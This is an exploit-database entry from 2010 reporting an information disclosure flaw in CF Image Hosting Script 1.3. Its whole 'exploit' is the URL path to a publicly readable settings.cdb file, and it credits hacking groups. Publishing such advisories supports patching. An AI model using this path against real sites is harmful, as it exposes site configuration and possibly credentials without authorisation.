id: 13902
date: 08/29/2010
title: CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure
author: Dr.$audi
cves: 

=================================================================
CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure
=================================================================

### Title: CF Image Hosting script 1.3 (settings.cdb) Information Disclosure Vulnerability ###
#######################################
#
# By: Dr.$audi
# Home: sa-virus.com
# Email: Mon7b6@gmail.com
# Date: aug 29th 2010
# Greez to: all sa-virus and v4-team members .
#
#######################################
#
# Script: CF Image Hosting script v 1.3
# HomePage: www.codefuture.co.uk/projects/imagehost1.3/
#
#######################################
#
# Exploit:
#
# http://server/upload/data/settings.cdb
#
#######################################



#  0day.today [2023-03-22]  #